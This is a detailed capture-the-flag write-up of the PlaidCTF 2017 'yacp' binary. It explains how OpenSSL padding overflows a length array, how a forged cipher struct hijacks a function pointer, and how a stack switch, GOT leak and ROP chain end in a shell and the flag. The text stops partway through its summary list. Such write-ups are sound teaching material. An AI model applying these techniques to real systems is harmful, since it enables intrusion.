PlaidCTF 2017: pwn300 "yacp"

The organizers threw “yet another crypto problem” (yacp) at us. It’s a 32bit ELF binary that implements a simple encryption / hashing service. In the following we describe our (most likely overly complicated) three-stage exploit that would get us the flag just one hour after the competition ended. The writeup is intentionally written in a rather detailed way, so skip right to the bottom if you’re only interested in the high-level summary of what we did.

Program Overview

According to Hex-Rays, the (somewhat beautified) service we’re dealing with looks like the following:

void __cdecl main(int a1)
{
  int v1; // [sp+1Ch] [bp-8h]@3

  setbuf(stdout, 0);
  OpenSSL_add_all_digests();
  OpenSSL_add_all_ciphers();
  puts("Welcome to the cryptotool!");
  puts("Because apparently, you can never have too much crypto!");
  if ( a1 == 1 )
    hashcash();
  while ( 2 )
  {
    puts("\nWhat would you like to do?");
    puts("0. Load data");
    puts("1. Generate random data");
    puts("2. Hash data");
    puts("3. Encrypt data");
    puts("4. Decrypt data");
    puts("5. Display data");
    if ( __isoc99_scanf("%d", &v1) == 1 )
    {
      switch ( v1 )
      {
        case 4:
          decrypt_data();
          continue;
        case 3:
          encrypt_data();
          continue;
        case 2:
          hash_data();
          continue;
        case 1:
          generate_random_data();
          continue;
        case 0:
          load_data();
          continue;
        case 5:
          display_data();
          continue;
        default:
          goto LABEL_11;
      }
    }
    break;
  }
LABEL_11:
  puts("Invalid choice. Goodbye");
  exit(-1);
}

From a high-level perspective, we can choose from six functions: 0) lets us store arbitrary data on the server, 1) fills a buffer with data from /dev/urandom, 2) lets us pick a hashing algorithm to transform data, 3) and 4) let us pick an encryption algorithm for [en|de]crypting data, and 5) is function that echoes back data.

All [hashing|crypto] is implemented using OpenSSL: The user is to pick a [digest|cipher] by specifying its name as a string, which is passed into EVP_get_cipherbyname. The returned value is used as a type argument to the high-level OpenSSL EVP functions EVP_CipherInit_ex. Encrypting the data is then done by calling EVP_CipherUpdate and EVP_CipherFinal_ex. To make clear, let’s look at encrypt_data as an example:

int encrypt_data()
{
  size_t v0; // eax@1
  char *v1; // ecx@2
  char v2; // al@2
  unsigned int in_buf_id; // edi@6
  unsigned int out_buf_id; // ebx@6
  unsigned int key_buf_id; // esi@6
  unsigned int iv_buf_id; // ebp@6
  int result; // eax@6
  char *lineptr; // [sp+20h] [bp-2Ch]@1
  size_t n; // [sp+24h] [bp-28h]@1
  int v10; // [sp+28h] [bp-24h]@6
  int v11; // [sp+2Ch] [bp-20h]@6

  lineptr = 0;
  _IO_getc(stdin);
  puts("What type of cipher would you like to perform?");
  v0 = getline(&lineptr, &n, stdin);
  n = v0;
  if ( v0 <= 1 )
  {
    puts("Sorry, didn't catch that. Goodbye");
  }
  else
  {
    v1 = &lineptr[v0 - 1];
    v2 = 0;
    if ( *v1 != 10 )
      v2 = *v1;
    *v1 = v2;
    evp_cipher = EVP_get_cipherbyname(lineptr);
    free(lineptr);
  }
  if ( !evp_cipher )
  {
    puts("Unknown cipher format. Goodbye");
    exit(-1);
  }
  __printf_chk(1, "For your input, ");
  in_buf_id = read_buffer_id();
  __printf_chk(1, "For your output, ");
  out_buf_id = read_buffer_id();
  __printf_chk(1, "For your key, ");
  key_buf_id = read_buffer_id();
  __printf_chk(1, "For an IV (use any buffer if not needed) ");
  iv_buf_id = read_buffer_id();
  EVP_CIPHER_CTX_init(&cipher_ctx);
  EVP_CipherInit_ex(&cipher_ctx, evp_cipher, 0, user_chunk_dat[key_buf_id], user_chunk_dat[iv_buf_id], 1);
  EVP_CipherUpdate(&cipher_ctx, user_chunk_dat[out_buf_id], &v10, user_chunk_dat[in_buf_id], user_chunk_len[in_buf_id]);
  EVP_CipherFinal_ex(&cipher_ctx, &user_chunk_dat[out_buf_id][v10], &v11);
  result = EVP_CIPHER_CTX_cleanup(&cipher_ctx);
  user_chunk_len[out_buf_id] = v11 + v10;
  return result;
}

The most interesting thing here to note is that all functions operate on two global arrays residing in static memory:

  • unsigned char user_chunk_dat[0x20][0x800] are buffers that we can fill using either load_data or generate_random_data(). All hashing and [en|de]cryption is performed by letting the user select one of the 32 0x800 bytes buffers as input, output or [crypto|hash] parameters.
  • unsigned int user_chunk_len[0x20] stores the corresponding length of each chunk.

Looking for memory corruptions

Unfortunately, whenever user data is written into one of the buffers, the code ensures that at most 0x800 bytes are written. Additionally, when selecting the buffer id to operate on, all functions make sure to keep the index in the range [0, 31], so no luck here as well.

What stands out though is that after [de|en]cryption, the length of the destination buffer gets updated as the sum of the output lengths of EVP_CipherUpdate (v10 above )and EVP_CipherFinal_ex (v11 above). The question is whether we can force the sum v11 + v10 to become larger than 0x800. So what happens if we tryo to encrypt a buffer (buffer 0, in the following example) of size 0x800 bytes?

➜  pwn300 python3 -c "print('0\n2048\n0\n' + 'AA' * 0x800 +
b'3\naes-256-cbc\n0\n0\n1\n1\n5\n0')" | ./run.sh
Welcome to the cryptotool!
Because apparently, you can never have too much crypto!

What would you like to do?
0. Load data
1. Generate random data
2. Hash data
3. Encrypt data
4. Decrypt data
5. Display data
How many bytes is the data?
Which buffer (0-31) would you like to use?
Okay, now please enter your 2048 hex-encoded bytes

What would you like to do?
0. Load data
1. Generate random data
2. Hash data
3. Encrypt data
4. Decrypt data
5. Display data
What type of cipher would you like to perform?
For your input, Which buffer (0-31) would you like to use?
For your output, Which buffer (0-31) would you like to use?
For your key, Which buffer (0-31) would you like to use?
For an IV (use any buffer if not needed) Which buffer (0-31) would you like to
use?

What would you like to do?
0. Load data
1. Generate random data
2. Hash data
3. Encrypt data
4. Decrypt data
5. Display data
Which buffer (0-31) would you like to use?
buffer[0] (**2064 bytes**) =
b5ebfc02a7268eef24412b9a99d041d7268e03a266c932c1e5fcfb01543aefdfbe3e153
7c0c18a4e4e795783267abda0b5658e7fab79797acffa8a42ba184b811e050935cc63a3
9e84afcbac6b0be99d9b555ffe82dfec88925d2204159bb211a0f4874f6a3132ab16abd
7bf3106918cd270247fb96dbcd9bac1854af32c27dabd00b6b028878e8108a74b0ca187
38e27cdc0d8b0a0c5f89c649b9c9e3a2057103aec1ab590d672de19edb8ddf3cf17cd11
[ ... lots of hex ... ]
5861238e75549bd27de4fcfe608ced3087e1930bfcd606ec24c726127126703c3890e95
59ec7ddeec3d7b54079647fe8531309a658fe5de4249a1c410e12b2b7609bd99d043fbf

Interesting! The resulting encrypted buffer is 2064 (0x810) bytes in size. The reason that this happens is that EVP_CipherFinal_ex happily adds PKCS7 padding to the block, even if our input already was a multiple of the block size used by AES … Well, one can’t say the OpenSSL developers didn’t warn you:

man EVP_EncryptFinal_ex
[...]
If padding is enabled (the default) then EVP_EncryptFinal_ex() encrypts 
the "final" data, that is any data that remains in a partial block. It
uses standard block padding (aka PKCS padding). The encrypted final data
is written to out which should have sufficient space for one cipher block. 
[...]

And indeed to confirm this theory:

from Crypto.Cipher import AES
import binascii
aes = AES.new(b'\x00' * 0x20, AES.MODE_CBC, b'\x00' * 0x10)
enc = 'b5ebfc02a7268eef24412b9a99' ## truncated for better readability
aes.decrypt(binascii.unhexlify(enc))
b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa'
## [ ... lots of hex again ... ]
b'\xaa\xaa\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10'

This means that we can let the (16 bytes of) encrypted padding of buffer $i$ overflow into buffer $i+1$. So what data structure is directly behind user_chunk_dat in the bss? The user_chunk_dat array is at 0x0804c0e0, each buffer of the 32 buffers is 0x800 in size, so what is at 0x804c0e0 + 0x20 * 0x800 = 0x805c0e0? IDA tells us the following:

.bss:0805C0E0 ; int user_chunk_len[32]
.bss:0805C0E0 user_chunk_len   dd ?,?,?,?,?,?,?,? ; DATA XREF: load_data+D6

Directly behind the user_chunk_dat array is the array storing the corresponding lengths of the chunks. So, by crafting a suitable plaintext, we can overwrite the lengths of the first 4 buffers (each length is stored as unsigned int, 4 bytes in size).

Obtaining Control of eip

At this point, we were lured a lot into thinking the whole idea of the exploit was centered around CVE-2017-3731, which, as we eventually control the length argument that is being fed into one of the OpenSSL functions, reads almost like a perfect fit:

If an SSL/TLS server or client is running on a 32-bit host, and a specific cipher is being used, then a truncated packet can cause that server or client to perform an out-of-bounds read, usually resulting in a crash. For OpenSSL 1.1.0, the crash can be triggered when using CHACHA20/POLY1305; users should upgrade to 1.1.0d. For Openssl 1.0.2, the crash can be triggered when using RC4-MD5; users who have not disabled that algorithm should update to 1.0.2k Reported by Robert Święcki of Google.

Fixed in OpenSSL 1.1.0d (Affected 1.1.0c, 1.1.0b, 1.1.0a, 1.1.0) Fixed in OpenSSL 1.0.2k (Affected 1.0.2j, 1.0.2i, 1.0.2h, 1.0.2g, 1.0.2f, 1.0.2e, 1.0.2d, 1.0.2c, 1.0.2b, 1.0.2a, 1.0.2)

We are running on a 32-bit host, the shipped libcrypto.so.1.0.0 has version 1.0.2g, so we should have a winner here, right?

Turns out, we do, but the CVE just leads to an out of bounds read, effectively crashing the program (as indicated by the description, admittedly). After realizing this peculiarity (and burning tons of time), we decided to look for better attack targets that finally lead to code execution.

Coming back to the crypto code we saw earlier

EVP_CipherInit_ex(&cipher_ctx, evp_cipher, 0, user_chunk_dat[key_buf_id], user_chunk_dat[iv_buf_id], 0);
EVP_CipherUpdate(&cipher_ctx, user_chunk_dat[out_buf_id], &v10, user_chunk_dat[in_buf_id], user_chunk_len[in_buf_id]);
EVP_CipherFinal_ex(&cipher_ctx, &user_chunk_dat[out_buf_id][v10], &v11);

it is evident that, because we (somewhat) control user_chunk_ken, that we can overwrite everything that is mapped behind the user_chunk_dat array. Let’s see what is there:

.bss:0805C0E0 ; int user_chunk_len[32]
.bss:0805C0E0 user_chunk_len  dd ?,?,?,?,?,?,?,?  ; DATA XREF: load_data+D6
.bss:0805C0E0                                     ; generate_random_data+58
.bss:0805C0E0                                     ; hash_data+F6
.bss:0805C0E0                                     ; hash_data+14C
.bss:0805C0E0                                     ; encrypt_data+153
.bss:0805C0E0                                     ; encrypt_data+1B3
.bss:0805C0E0                                     ; decrypt_data+153
.bss:0805C0E0                                     ; decrypt_data+1B3
.bss:0805C0E0                 dd ?,?,?,?,?,?,?,?  ; 8
.bss:0805C0E0                 dd ?,?,?,?,?,?,?,?  ; 10h
.bss:0805C0E0                 dd ?,?,?,?,?,?,?,?  ; 18h
.bss:0805C160 md_ctx          db ?,?,?,?,?,?,?,?  ; DATA XREF: hash_data+CD
.bss:0805C160                                     ; hash_data+E6
.bss:0805C160                                     ; hash_data+10A
.bss:0805C160                                     ; hash_data+130
.bss:0805C160                                     ; hash_data+13C
.bss:0805C160                 db ?,?,?,?,?,?,?,?  ; 8
.bss:0805C160                 db ?,?,?,?,?,?,?,?  ; 10h
.bss:0805C178 cipher_ctx      db ?,?,?,?,?,?,?,?  ; DATA XREF: encrypt_data+104
.bss:0805C178                                     ; encrypt_data+147
.bss:0805C178                                     ; encrypt_data+177
.bss:0805C178                                     ; encrypt_data+18F
.bss:0805C178                                     ; encrypt_data+19F
.bss:0805C178                                     ; decrypt_data+104
.bss:0805C178                                     ; decrypt_data+147
.bss:0805C178                                     ; decrypt_data+177
.bss:0805C178                                     ; decrypt_data+18F
.bss:0805C178                                     ; decrypt_data+19F
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 8
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 10h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 18h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 20h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 28h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 30h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 38h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 40h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 48h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 50h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 58h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 60h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 68h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 70h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 78h
.bss:0805C178                 db ?,?,?,?,?,?,?,?  ; 80h
.bss:0805C178                 db ?,?,?,?          ; 88h
.bss:0805C204 evp_md_digestname dd ?              ; DATA XREF: hash_data+71
.bss:0805C204                                     ; hash_data:loc_8049052
.bss:0805C204                                     ; hash_data+D9
.bss:0805C208 ; _DWORD evp_cipher
.bss:0805C208 evp_cipher      dd ?                ; DATA XREF: encrypt_data+73
.bss:0805C208                                     ; encrypt_data:loc_8049204
.bss:0805C208                                     ; encrypt_data+112
.bss:0805C208                                     ; decrypt_data+73
.bss:0805C208                                     ; decrypt_data:loc_8049404
.bss:0805C208                                     ; decrypt_data+112
[ ... nothing until end of page ... ]

There is not much to attack here. Our only hope is that cipher_ctx or md_ctx contains some kind of control flow related data. Let’s inspect some memory in gdb:

gdb> x/100xw 0x0805c0e0
            ,--------------------------------------------- int user_chunk_len[32]
            V
0x805c0e0:    0x00000820  0x00000000  0x00000000  0x00000000
0x805c0f0:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c100:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c110:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c120:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c130:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c140:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c150:    0x00000000  0x00000000  0x00000000  0x00000000
            ,--------------------------------------------- EVP_MD md_ctx
            V
0x805c160:    0x00000000  0x00000000  0x00000000  0x00000000
                                    ,--------------------- EVP_CIPHER_CTX cippher_ctx
                                    V
0x805c170:    0x00000000  0x00000000  0xf7fc0660  0x00000000
0x805c180:    0x00000001  0x00000000  0x09af3041  0x608789e0
0x805c190:    0x0b3d759e  0x190d207c  0x09af3041  0x608789e0
0x805c1a0:    0x0b3d759e  0x190d207c  0x00000000  0x00000000
0x805c1b0:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c1c0:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c1d0:    0x00000020  0x00000000  0x0805e578  0x00000000
0x805c1e0:    0x0000000f  0x00000000  0x00000000  0x00000000
0x805c1f0:    0x00000000  0x00000000  0x00000000  0x00000000
                        ,--------------------------------- EVP_MD *evp_md_digestname
                        |           ,--------------------- EVP_CIPHER *evp_chipher
                        V           V
0x805c200:    0x00000000  0x00000000  0xf7fc0660  0x00000000
0x805c210:    0x00000000  0x00000000  0x00000000  0x00000000
0x805c220:  [ ... zeroes until end of page ... ]

Comparing the only pointers 0xf7fc0660, 0x0805e578 with the memory maps of the virtual address space tells us that none of them are function pointers (i.e. all pointers point to memory that is not mapped executable):

 0x8048000  0x804b000 r-xp     3000 0      ~/ctf/2017_04_pctf/pwn300/yacp
 0x804b000  0x804c000 r--p     1000 2000   ~/ctf/2017_04_pctf/pwn300/yacp
 0x804c000  0x804d000 rw-p     1000 3000   ~/ctf/2017_04_pctf/pwn300/yacp
 0x804d000  0x807e000 rw-p    31000 0      [heap]
0xf7c04000 0xf7c06000 rw-p     2000 0
0xf7c06000 0xf7c09000 r-xp     3000 0      /lib/i386-linux-gnu/libdl-2.24.so
0xf7c09000 0xf7c0a000 r--p     1000 2000   /lib/i386-linux-gnu/libdl-2.24.so
0xf7c0a000 0xf7c0b000 rw-p     1000 3000   /lib/i386-linux-gnu/libdl-2.24.so
0xf7c30000 0xf7ddf000 r-xp   1af000 0      ~/ctf/2017_04_pctf/pwn300/libc.so.6
0xf7ddf000 0xf7de0000 ---p     1000 1af000 ~/ctf/2017_04_pctf/pwn300/libc.so.6
0xf7de0000 0xf7de2000 r--p     2000 1af000 ~/ctf/2017_04_pctf/pwn300/libc.so.6
0xf7de2000 0xf7de3000 rw-p     1000 1b1000 ~/ctf/2017_04_pctf/pwn300/libc.so.6
0xf7de3000 0xf7de6000 rw-p     3000 0
0xf7de6000 0xf7fb8000 r-xp   1d2000 0      ~/ctf/2017_04_pctf/pwn300/libcrypto.so.1.0.0
0xf7fb8000 0xf7fc8000 r--p    10000 1d1000 ~/ctf/2017_04_pctf/pwn300/libcrypto.so.1.0.0
0xf7fc8000 0xf7fcf000 rw-p     7000 1e1000 ~/ctf/2017_04_pctf/pwn300/libcrypto.so.1.0.0
0xf7fcf000 0xf7fd5000 rw-p     6000 0
0xf7fd5000 0xf7fd7000 r--p     2000 0      [vvar]
0xf7fd7000 0xf7fd9000 r-xp     2000 0      [vdso]
0xf7fd9000 0xf7ffb000 r-xp    22000 0      /lib/i386-linux-gnu/ld-2.24.so
0xf7ffc000 0xf7ffd000 r--p     1000 22000  /lib/i386-linux-gnu/ld-2.24.so
0xf7ffd000 0xf7ffe000 rw-p     1000 23000  /lib/i386-linux-gnu/ld-2.24.so
0xfff76000 0xffffe000 rw-p    88000 0      [stack]

Note that the heap being mapped right next to the end of the data segment is a gdb artifact! Therefore continuing the overflow into the heap is not a viable attack vector.

Now, what about the referenced data structures? Do they contain function pointers we could hijack?

gdb> x/20xw 0x0805e578
0x0805e578:   0x09af3041  0x608789e0  0x0b3d759e  0x190d207c
0x0805e588:   0x573621a6  0x686e9e9d  0x425bd2bf  0x0191aa10
0x0805e598:   0xc3d3b1ec  0xa354380c  0xa8694d92  0xb1646dee
0x0805e5a8:   0x9f751d8e  0xf71b8313  0xb54051ac  0xb4d1fbbc
0x0805e5b8:   0xa65e8fe1  0x050ab7ed  0xad63fa7f  0x1c079791

gdb> x/20xw 0xf7fc0660
0xf7fc0660:   0x000001ab  0x00000010  0x00000020  0x00000010
0xf7fc0670:   0x00001002  0xf7ea7770  0xf7ea7730  0x00000000
0xf7fc0680:   0x000000fc  0x00000000  0x00000000  0x00000000
0xf7fc0690:   0x00000000  0x00000000  0x00000000  0x00000000
0xf7fc06a0:   0x00000389  0x00000001  0x00000018  0x00000010

Gotcha! In the second fragment we find 0xf7ea7770 and 0xf7ea7730, both pointing into the code section of libcrypto.so. So, now, finally, we get eip by

  • placing a fake chunk into one of our buffers in the bss that holds a function pointer controlled by us at the correct place,
  • fiddleing with the encrypted padding such that we get an overflow that will not fall off the end of the page and segfault,
  • overwriting the cipher_ctx struct with a pointer to our fake chunk created above.

So, easy win incoming, right?

Nope. Setting watchpoints on the two pointer locations 0xf7fc0674 and 0xf7fc0678 told us that after calling _EVP_CipherUpdate (which is the function that is called with the length argument being too large), the OpenSSL code never looks at those function pointers again. :( As the cipher_ctx struct is initialized by the code each time before it is used, we cannot do a two-stage attack that first hijacks the struct and then forces the code to call the compromised function pointers. So we needed a one-shot solution, and, in fact we found one quickly!

Looking at the source code of EVP_EncryptFinal_ex we see our attack vector being hidden quite well:

int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
{
    int n, ret;
    unsigned int i, b, bl;

    if (ctx->cipher->flags & EVP_CIPH_FLAG_CUSTOM_CIPHER) {
        ret = M_do_cipher(ctx, out, NULL, 0);
        if (ret < 0)
            return 0;

Or, the more readable equivalent assembly code:

.text:000BDF60                 public EVP_EncryptFinal_ex
.text:000BDF60 EVP_EncryptFinal_ex proc near           ; CODE XREF: EVP_EncryptFinal+1B
.text:000BDF60                                         ; EVP_CipherFinal_ex+3E
.text:000BDF60                                         ; EVP_SealFinal+1D
.text:000BDF60                                         ; i2d_RSA_NET+407
.text:000BDF60                                         ; PEM_SealFinal+104
.text:000BDF60                                         ; PEM_ASN1_write_bio+49B
.text:000BDF60
.text:000BDF60 arg_0           = dword ptr  4
.text:000BDF60 arg_4           = dword ptr  8
.text:000BDF60 arg_8           = dword ptr  0Ch
.text:000BDF60
.text:000BDF60                 push    edi
.text:000BDF61                 push    esi
.text:000BDF62                 push    ebx
.text:000BDF63                 mov     edi, [esp+0Ch+arg_0]
.text:000BDF67                 call    start
.text:000BDF6C                 add     ebx, 124094h
.text:000BDF72                 mov     eax, [edi]
.text:000BDF74                 test    byte ptr [eax+12h], 10h
.text:000BDF78                 jnz     short loc_BDFF0
[ ... snip ... ]
.text:000BDFF0                 push    0
.text:000BDFF2                 push    0
.text:000BDFF4                 push    [esp+14h+arg_4]
.text:000BDFF8                 push    edi
.text:000BDFF9                 call    dword ptr [eax+18h]

As we fully control ctx, we can easily set bit 9 (EVP_CIPH_FLAG_CUSTOM_CIPHER) in ctx->cipher->flags to make sure our fake pointer at offset 0x18 within the struct is called. And indeed, after all this struggle we were finally greeted by

*EAX  0x805b8e0 ◂— 0x1ab
*EBX  0xf7fc8000 ◂— 0x1e1aa8
*ECX  0xffffcfec —▸ 0xf7c04700 ◂— 0xf7c04700
*EDX  0x805ced0 ◂— 0x0
*EDI  0x805c178 —▸ 0x805b8e0 ◂— 0x1ab
*ESI  0x805ced0 ◂— 0x0
 EBP  0x80598e0 ◂— 0x0
*ESP  0xffffcf7c —▸ 0xf7ea3ffc (EVP_EncryptFinal_ex+156) ◂— mov    edx, eax
*EIP  0x41414141 ('AAAA')
Program received signal SIGSEGV (fault address 0x41414141)
gdb>

Control of eip != Easy Remote Code Execution

We got eip! Cool. What do we do now? Well, as always, our final goal is to call system("/bin/bash"), right? There is just one catch: We have no idea where glibc is loaded (we really didn’t feel like having even the tiniest bit of non-determinism in our exploit, as the hash cash for this task was kinda expensive) and we only control one call, which is totally different from actually having ROP.

What one does usually in such a situation is to either look for a suitable stack lifting gadget, which shifts the stack pointer to an attacker controlled region. However, in case of this binary we were unable to find any buffer on the stack controlled by us, so bad luck here.

Second technique is considering a stack switch, which is a viable option if we control large buffers at known addresses where we could place a fake stack. Hm … we have plenty of space in the .bss, so why not try getting esp to point there. Do we have a way to load esp with a pointer pointing to attacker controlled memory?

➜  pwn300 ROPgadget --binary yacp | grep esp
0x080488a8 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
0x08049920 : add byte ptr es:[eax], al ; add esp, 8 ; pop ebx ; ret
0x080495f4 : add esp, 0x10 ; pop ebx ; pop esi ; pop edi ; ret
0x080498f9 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048d86 : add esp, 0x1c ; ret
0x08049123 : add esp, 0x24 ; pop ebx ; pop esi ; ret
0x08048f8f : add esp, 0x28 ; pop ebx ; ret
0x08048edd : add esp, 0x2c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048d01 : add esp, 0x2c ; ret
0x0804933a : add esp, 0x3c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804982a : add esp, 0x90 ; pop ebx ; pop esi ; pop edi ; ret
0x080488aa : add esp, 8 ; pop ebx ; ret
0x08048c6a : and al, 4 ; mov dword ptr [esp], 0x804c084 ; call edx
0x08049e3b : call esp
0x08048cfd : clc ; pop ds ; ja 0x8048d24 ; add esp, 0x2c ; ret
0x08048cfc : cmp eax, 0x1f ; ja 0x8048d25 ; add esp, 0x2c ; ret
0x08048d80 : fisttp word ptr [ebp - 0x37f636be] ; add esp, 0x1c ; ret
0x08048d82 : inc edx ; leave ; or eax, ecx ; add esp, 0x1c ; ret
0x08048cff : ja 0x8048d22 ; add esp, 0x2c ; ret
0x0804991f : jecxz 0x804994f ; add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
0x080495f2 : jg 0x80495d0 ; add esp, 0x10 ; pop ebx ; pop esi ; pop edi ; ret
0x080498f7 : jne 0x80498e1 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048d81 : lea eax, dword ptr [edx - 0x37] ; or eax, ecx ; add esp, 0x1c ; ret
0x08048d83 : leave ; or eax, ecx ; add esp, 0x1c ; ret
0x08049124 : les esp, ptr [ebx + ebx*2] ; pop esi ; ret
0x08048cb8 : mov dword ptr [esp], 0x804bf08 ; call eax
0x08048c2f : mov dword ptr [esp], 0x804c084 ; call eax
0x08048c6c : mov dword ptr [esp], 0x804c084 ; call edx
0x08048c00 : mov ebx, dword ptr [esp] ; ret
0x08048bff : nop ; mov ebx, dword ptr [esp] ; ret
0x08048bfd : nop ; nop ; mov ebx, dword ptr [esp] ; ret
0x08048bfb : nop ; nop ; nop ; mov ebx, dword ptr [esp] ; ret
0x080495f1 : or byte ptr [edi - 0x2c], bh ; add esp, 0x10 ; pop ebx ; pop esi ; pop edi ; ret
0x08048d84 : or eax, ecx ; add esp, 0x1c ; ret
0x08048cfe : pop ds ; ja 0x8048d23 ; add esp, 0x2c ; ret
0x08048cfb : sbb al, 0x83 ; clc ; pop ds ; ja 0x8048d26 ; add esp, 0x2c ; ret

No explicit stack manipulation. We were hoping for something like [mov|xchg esp, <somereg> but these tend to be rare in 32-bit binaries. Nevertheless, we found at least a leave; ret at 0x08048c38, which perfectly matched our needs, if only we could control the buffer ebp is pointing to at crash time.

➜  pwn300 ~/git/ROPgadget/ROPgadget.py --binary yacp | grep leave
0x08048d82 : inc edx ; leave ; or eax, ecx ; add esp, 0x1c ; ret
0x08048d83 : leave ; or eax, ecx ; add esp, 0x1c ; ret
0x08048c38 : leave ; ret
0x08048c94 : mov byte ptr [0x804c0c4], 1 ; leave ; ret
0x08048c99 : or byte ptr [ecx], al ; leave ; ret
0x08048c97 : rol byte ptr [eax + ecx], 1 ; leave ; ret

Coming back to the crash:

*EAX  0x805b8e0 ◂— 0x1ab
*EBX  0xf7fc8000 ◂— 0x1e1aa8
*ECX  0xffffcfec —▸ 0xf7c04700 ◂— 0xf7c04700
*EDX  0x805ced0 ◂— 0x0
*EDI  0x805c178 —▸ 0x805b8e0 ◂— 0x1ab
*ESI  0x805ced0 ◂— 0x0
 EBP  0x80598e0 ◂— 0x0
*ESP  0xffffcf7c —▸ 0xf7ea3ffc (EVP_EncryptFinal_ex+156) ◂— mov    edx, eax
*EIP  0x41414141 ('AAAA')
Program received signal SIGSEGV (fault address 0x41414141)
gdb>

0x80598e0 indeed looks familiar! This is well within the area of the user_chunk_dat array. We did a quick experiment and picked a different buffer id for each of the crypto parameters: $27$ for the IV, $28$ for input and output, and $29$ for the key. Then, python tells us that (0x80598e0-0x0804C0E0) // 0x800 = 27. Ooookay, so we could switch stack into the IV used for the crypto. Not precisely comfortable, but we finally want this flag! We decided that a complete overlap of the IV and the ROP chain would be too much and first looked for one gadget that would shift the stack far away from the actual 16 bytes of the IV (thus being a stack lift after a stack switch, nice!):

➜  pwn300 ~/git/ROPgadget/ROPgadget.py --binary yacp | grep ": add esp"
0x080488a8 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
0x08049920 : add byte ptr es:[eax], al ; add esp, 8 ; pop ebx ; ret
0x080495f4 : add esp, 0x10 ; pop ebx ; pop esi ; pop edi ; ret
0x080498f9 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048d86 : add esp, 0x1c ; ret
0x08049123 : add esp, 0x24 ; pop ebx ; pop esi ; ret
0x08048f8f : add esp, 0x28 ; pop ebx ; ret
0x08048edd : add esp, 0x2c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048d01 : add esp, 0x2c ; ret
0x0804933a : add esp, 0x3c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804982a : add esp, 0x90 ; pop ebx ; pop esi ; pop edi ; ret
0x080488aa : add esp, 8 ; pop ebx ; ret

Most of those would do the job, but (for no specific reason) we decided for the one at 0x080498f9 and enjoyed gdb stepping through our (finally unconstrained) ROP chain.

The last obstacle now was that we still needed an address pointing into glibc to calculate where system was. We did this by writing a classic leak from the GOT. As the final step, we needed to force the other side to read in a second stage ROP chain which could finally make use of the (now known) addresses to set up a call to system("/bin/sh"); The drama culminated when we found out that the only function reading continuously from stdin the readline in the hash cash routine - which would happily kill our process if the input wouldn’t satisfy the constraints imposed by that function. Note that calling readline ourselves would have involved knowing the address of stdin in glibc, which is still unknown in the first stage ROP chain.

As we really, really, really didn’t feel like constructing a second stage ROP chain that would hash to something the hash cash checker would consider valid, we reverted to calling scanf with a string containing a %s as first argument and a pointer pointing onto the current esp value in the .bss. The latter is a neat trick to avoid having to switch stack a second time as, after returning from scanf, the new ROP chain would simply start at where esp pointed to by that time.

Time to profit:

➜  pwn300 ./pwn.py
[+] Solving hash for 89bfafeb0199cf6d with length 32
[+] Found:
    fffffffea5edc3ae3a9abdefc6e54bfe7a0a078e703a1a3e3e33e313ca2e2735
    89bfafeb0199cf6d0000000003699bf4
[+] Placing key in memory ...
[+] Placing iv and ROP chain in memory ...
[+] Placing encrypted fake chunk ...
[+] Overwriting length of chunk 2 ...
[+] Hijacking md_ctxt struct ...
[+] libc @ f73d8000
[+] Shell incoming ...
id
uid=1000(yacp) gid=1000(yacp) groups=1000(yacp)
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd /home
ls
yacp
cd yacp
ls
flag
yacp
yacp.wrapper
cat flag
PCTF{porque_no_los_dos}

Summary

Awesome! To wrap it up, this is what our exploit does:

  1. Pick an IV that is composed of the address to the stack lifting gadget at position $4$ and zeroes otherwise.
  2. Pad the IV to contain our first stage ROP chain (well behind the first 0x10 bytes to not interfere with the crypto).
  3. Calculate a key that, when encrypting a stream of 0x41 bytes and using the IV from above, results in the overflowing padding to contain at least at one of the four valid positions an unsigned int in the range $[0x89c; 0x1720]$.
  4. Place key and (IV + first stage ROP chain) in separate chunks.
  5. Encrypt a fake CIPHER_CTXT struct containing a pointer to the stack switch gadget as cipher function pointer and the EVP_CIPH_FLAG_CUSTOM_CIPHER flag set:
